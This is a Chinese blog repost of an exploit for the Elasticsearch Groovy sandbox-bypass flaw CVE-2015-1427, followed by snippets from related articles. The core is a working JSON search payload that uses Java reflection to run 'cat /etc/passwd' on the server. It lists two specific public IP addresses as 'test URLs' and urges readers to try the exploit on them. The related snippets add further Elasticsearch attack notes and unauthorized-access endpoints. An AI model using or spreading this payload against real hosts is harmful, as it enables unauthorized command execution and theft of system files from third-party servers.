Elasticsearch Groovy任意命令执行漏洞EXP

最新推荐文章于 2021-11-17 09:51:28 发布
最新推荐文章于 2021-11-17 09:51:28 发布
阅读量313 收藏
点赞数
文章标签: 大数据 java runtime
原文链接:http://www.cnblogs.com/Le30bjectNs11/p/4317559.html
版权

感谢:@lupin 的分析(Elasticsearch Groovy 脚本动态执行漏洞分析和poc(CVE-2015-1427)) 
本exp不一定正确,测试的站太少了,大家去测试测试。 
测试url:http://190.196.67.252:9200/_search?pretty 
http://191.234.18.14:9200///_search?pretty 
{"size":1,"script_fields": {"iswin": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"cat /etc/passwd\").getInputStream())).readLines()","lang": "groovy"}}}
is.jpg

 

 

EXP:https://github.com/Svti/ElasticSearchEXP/

 

转载自乌云zone

转载于:https://www.cnblogs.com/Le30bjectNs11/p/4317559.html

Jiajia2017
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ElasticSearch几个漏洞总结
u011066706的专栏
04-17 2万+
ElasticSearch远程命令执行(CVE-2014-3120) 漏洞介绍: ElasticSearch有脚本执行(scripting)的功能,可以很方便地对查询出来的数据再加工处理。ElasticSearch用的脚本引擎是MVEL,这个引擎没有做任何的防护,或者沙盒包装,所以直接可以执行任意代码。 而在ElasticSearch 1.2之前的版本中,默认配置是打开动态脚本功能的,如
ElasticSearch Groovy远程代码执行POC和exp
热门推荐
Exploit的小站~
05-10 1万+
 ElasticSearch的这个漏洞的编号是CVE-2015-1427,影响版本为1.3.0-1.3.7以及1.4.0-1.4.2,漏洞成因详见:http://drops.wooyun.org/papers/5107,本文具体探讨一下漏洞利用。 1.2.0版本默认是禁用了脚本执行,如果要使用该功能的话,要在elasticsearch.yml中设置script.disable_dynami...
ElasticSearch未授权访问的检测与利用思路
zhalang8324的博客
12-29 9733
基本说明 VulBOX https://book.thief.one/webying-yong-lou-dong/136-elasticsearchwei-shou-quan-fang-wen-lou-dong.html 延伸阅读 https://www.ichunqiu.com/course/1413 Redis未授权访问 其他 NoSQL未授权访问 MongoDB、Redis
ElasticSearch Groovy脚本远程代码执行漏洞检测脚本和修复方案
03-06 283
检测脚本: #!/usr/bin/envpython importurllib importurllib2 importjson importsys defexecute(url,command): parameters={"size":1, "scr...
ElasticSearch Groovy脚本远程代码执行漏洞分析(CVE-2015-1427) (附exp
xiaomin1991222的专栏
10-16 1118
ElasticSearch是一个JAVA开发的搜索分析引擎。 2014年,曾经被曝出过一个远程代码执行漏洞CVE-2014-3120),漏洞出现在脚本查询模块,由于搜索引擎支持使用脚本代码(MVEL),作为表达式进行数据操作,攻击者可以通过MVEL构造执行任意java代码, 后来脚本语言引擎换成了Groovy,并且加入了沙盒进行控制,危险的代码会被拦截,结果这次由于沙盒限制的不严格,导致远...
Elasticsearch Groovy 远程代码执行漏洞1
08-08
在本文中,我们将探讨 Elasticsearch 中的一个 Groovy 远程代码执行漏洞,该漏洞允许攻击者通过构造恶意请求来执行任意系统命令,从而可能导致严重的信息泄露或系统破坏。这个漏洞主要源于 Elasticsearch 允许用户在...
ElasticSearch 远程代码执行漏洞分析(CVE-2015-1427)&高级利用方法1
08-08
ElasticSearch 远程代码执行漏洞分析(CVE-2015-1427)&高级利用方法1 ElasticSearch 是一个基于 Lucene 的搜索引擎,提供了强大的搜索功能。然而,在 2015 年,一种远程代码执行漏洞CVE-2015-1427)被发现,影响...
elasticsearch常用命令脚本
11-26
后端工程师开发时经常需要操作es,要是每次都去找相关命令就太麻烦了。这里提供了常用的es操作脚本,比如删除单个索引、删除多个索引、创建索引、查看全部索引、查看粉刺等等,以及深分页查询脚本
elasticsearch-groovy-1.7.5.jar
05-31
Elasticsearch 的官方 Groovy 客户端 org.elasticsearch/elasticsearch-groovy/1.7.5/elasticsearch-groovy-1.7.5.jar
elasticsearch未授权访问 漏洞修复
最新发布
05-09
然后,通过命令 `./elasticsearch-setup-passwords interactive` 在 `/usr/share/elasticsearch/bin/` 目录下设置用户密码,包括默认的 `elastic` 用户。确保在 Kibana 的配置文件 `/etc/kibana/kibana.yml` 中添加...
一些安全问题
ytuo1223的专栏
05-21 581
0x01   mongodb未授权访问 扫描服务器是否开启了端口27017,使用客户端直接连接 客户端下载   http://www.mongovue.com/downloads/  0x02 mongdb的REST接口,提供一个web界面访问,默认运行在28017端口上,扫描28017,可以直接通过浏览器访问 http://host:28017  这个借口的开启需要修改配置
CVE-2015-1427 ElasticSearchGroovy 沙盒绕过 && 代码执行漏洞
weixin_51387754的博客
11-17 2609
漏洞简介 CVE-2014-3120后,ElasticSearch默认的动态脚本语言换成了Groovy,并增加了沙盒,但默认仍然支持直接执行动态语言。本漏洞:1.是一个沙盒绕过; 2.是一个Goovy代码执行漏洞漏洞原因很简单,由于沙盒代码黑名单中的Java危险方法不全,从而导致恶意用户仍可以使用反射的方法来执行Java代码。这就完了?当然不是!由于Elasticsearch开发团队没有完全认知Groovy的强大,以为仅仅防止用户调用Java反射就可以免于被攻击,这真是太好笑了,我们来看下Groovy
ElasticSearch Groovy脚本远程代码执行漏洞
weixin_34060741的博客
03-05 152
什么是ElasticSearch?它是一种分布式的、实时性的、由JAVA开发的搜索和分析引擎。2014年,曾经被曝出过一个远程代码执行漏洞CVE-2014-3120),漏洞出现在脚本查询模块,由于搜索引擎支持使用脚本代码(MVEL),作为表达式进行数据操作,***者可以通过MVEL构造执行任意java代码,后来脚本语言引擎换成了Groovy,并且加入了沙盒进行控制,危险的代码会被拦截,结果这次由...
CVE-2015-1427Groovy 沙盒绕过 && 代码执行漏洞
浅笑996的博客
11-22 1947
1、vulhub环境搭建 https://blog.csdn.net/qq_36374896/article/details/84102101 2、启动docker环境 cd vulhub-master/elasticsearch/CVE-2015-1427/ sudo docker-compose up 3、访问目标的9200,会出现Elasticsearch的信息: 新版本中Elastic...
Groovy之旅系列九(Groovy常见命令)
上善若水
05-26 1261
如果需要用Shell来执行Groovy脚本的话,可以用以下三个命令。 1.groovysh: 启动一个groovysh命令行shell,来执行groovy代码交互。 2.groovyConsole: 启动一个可以执行groovy代码的图形界面,另外,groovyConsole还可以加载和执行Groovy脚本文件。 3.groovy : 启动groovy的脚本解释程序。单行的groovy脚本可以作为...
ElasticSearch Groovy 沙盒绕过 && 代码执行漏洞CVE-2015-1427)测试环境
EC_Carrot的博客
05-31 314
漏洞背景 CVE-2014-3120后,ElasticSearch默认的动态脚本语言换成了Groovy,并增加了沙盒,但默认仍然支持直接执行动态语言。本漏洞:1.是一个沙盒绕过; 2.是一个Goovy代码执行漏洞漏洞复现 由于查询时至少要求es中有一条数据,所以发送如下数据包,增加一个数据: POST /website/blog/ HTTP/1.1 Host: your-ip:9200 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (co
Elasticsearch 漏洞收集总结
sojrs_sec的博客
12-31 7677
一:未授权访问获取敏感信息 /_cat/indices /_plugin/sql/ /_nodes /_search /_search?preety /_status 二:目录遍历漏洞cve-2015-3337) 安装“site”功能的插件后,插件目录使用…/向上跳转,导致目录穿越漏洞,可读取任意文件。未安装site功能插件的不受影响 /_cat/plugins:查看所有已安装的插件 一般复现...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值